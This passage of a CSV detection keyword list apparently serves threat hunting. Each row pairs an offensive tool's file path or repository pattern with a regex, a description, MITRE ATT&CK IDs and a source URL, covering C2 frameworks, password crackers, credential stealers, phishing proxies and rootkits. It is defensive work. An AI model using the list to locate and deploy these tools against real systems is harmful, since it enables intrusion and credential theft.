from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*/unshackle.modules*",".{0,1000}\/unshackle\.modules.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" 
"*/unstable/net/iodine*",".{0,1000}\/unstable\/net\/iodine.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*/unused/locktest.sh*",".{0,1000}\/unused\/locktest\.sh.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/unused/Yosemite.patch*",".{0,1000}\/unused\/Yosemite\.patch.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/unusual-port.nse*",".{0,1000}\/unusual\-port\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/upnp-info.nse*",".{0,1000}\/upnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/uptime-agent-info.nse*",".{0,1000}\/uptime\-agent\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/url-snarf.nse*",".{0,1000}\/url\-snarf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/user_data/*/keylog.txt*",".{0,1000}\/user_data\/.{0,1000}\/keylog\.txt.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*/user_persistence_run.c*",".{0,1000}\/user_persistence_run\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation 
tools","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*/userenum.go*",".{0,1000}\/userenum\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*/userenum.go*",".{0,1000}\/userenum\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*/UserlandBypass/*.c*",".{0,1000}\/UserlandBypass\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*/username-anarchy*",".{0,1000}\/username\-anarchy.{0,1000}","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. 
Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","N/A","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","1","N/A","N/A","7","680","120","2024-02-28T16:57:48Z","2012-11-07T05:35:10Z" "*/UserNamespaceOverlayfsSetuidWriteExec/*",".{0,1000}\/UserNamespaceOverlayfsSetuidWriteExec\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/Use-Waitfor.exe*",".{0,1000}\/Use\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*/usniper.py*",".{0,1000}\/usniper\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/usr/bin/legba*",".{0,1000}\/usr\/bin\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*/usr/bin/merlinAgent*",".{0,1000}\/usr\/bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/usr/bin/pkexec*",".{0,1000}\/usr\/bin\/pkexec.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","1","N/A","N/A","1","96","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*/usr/bin/polenum*",".{0,1000}\/usr\/bin\/polenum.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - 
T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*/usr/local/bin/exegol*",".{0,1000}\/usr\/local\/bin\/exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/usr/local/bin/nullinux*",".{0,1000}\/usr\/local\/bin\/nullinux.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*/usr/local/bin/reverst*",".{0,1000}\/usr\/local\/bin\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*/usr/local/pwndrop/*",".{0,1000}\/usr\/local\/pwndrop\/.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*/usr/sbin/tor*",".{0,1000}\/usr\/sbin\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web 
browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/usr/share/brutespray*",".{0,1000}\/usr\/share\/brutespray.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*/usr/share/cobaltstrike/*",".{0,1000}\/usr\/share\/cobaltstrike\/.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*/usr/share/evilginx*",".{0,1000}\/usr\/share\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" 
"*/usr/share/keyrings/tor-archive-keyring*",".{0,1000}\/usr\/share\/keyrings\/tor\-archive\-keyring.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*/usr/share/kidlogger*",".{0,1000}\/usr\/share\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/usr/share/wordlists/*.txt*",".{0,1000}\/usr\/share\/wordlists\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/usr/src/netexec*",".{0,1000}\/usr\/src\/netexec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/utils/addcomputer.py*",".{0,1000}\/utils\/addcomputer\.py.{0,1000}","offensive_tool_keyword","sam-the-admin","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","10","959","191","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" "*/utils/obfuscate.py*",".{0,1000}\/utils\/obfuscate\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/UTWOqVQ132/*",".{0,1000}\/UTWOqVQ132\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/UUID_bypass.py*",".{0,1000}\/UUID_bypass\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/v1.0.0/moonwalk_linux*",".{0,1000}\/v1\.0\.0\/moonwalk_linux.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" 
"*/vainject.c*",".{0,1000}\/vainject\.c.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/vajra/phishApp.py*",".{0,1000}\/vajra\/phishApp\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/var/lib/ptunnel*",".{0,1000}\/var\/lib\/ptunnel.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*/var/lib/tor/*",".{0,1000}\/var\/lib\/tor\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/var/log/apache2/forensic_log-10080.log*",".{0,1000}\/var\/log\/apache2\/forensic_log\-10080\.log.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*/var/log/evilginx*",".{0,1000}\/var\/log\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*/var/log/exegol/*.log*",".{0,1000}\/var\/log\/exegol\/.{0,1000}\.log.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/var/log/tor/*",".{0,1000}\/var\/log\/tor\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web 
browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/var/tmp/.memory/diamorphine.c*",".{0,1000}\/var\/tmp\/\.memory\/diamorphine\.c.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*/var/tmp/.memory/diamorphine.h*",".{0,1000}\/var\/tmp\/\.memory\/diamorphine\.h.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*/var/www/html/dynasty_rce*",".{0,1000}\/var\/www\/html\/dynasty_rce.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - 
LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*/var0xshell.git*",".{0,1000}\/var0xshell\.git.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*/vas/fuzzers/fuzz/*",".{0,1000}\/vas\/fuzzers\/fuzz\/.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*/VBad.git*",".{0,1000}\/VBad\.git.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. 
It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "*/VDR.git*",".{0,1000}\/VDR\.git.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*/VDR-main.zip",".{0,1000}\/VDR\-main\.zip","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*/VectorKernel.git*",".{0,1000}\/VectorKernel\.git.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*/veeam_dump.py*",".{0,1000}\/veeam_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/veeam-creds.git*",".{0,1000}\/veeam\-creds\.git.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored 
passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*/Vegile.git*",".{0,1000}\/Vegile\.git.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your specific process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a process which while run another process.So we can assume that this process is unstoppable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","695","162","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*/Venom.git*",".{0,1000}\/Venom\.git.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/venom.git*",".{0,1000}\/venom\.git.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/venom.sh *",".{0,1000}\/venom\.sh\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" 
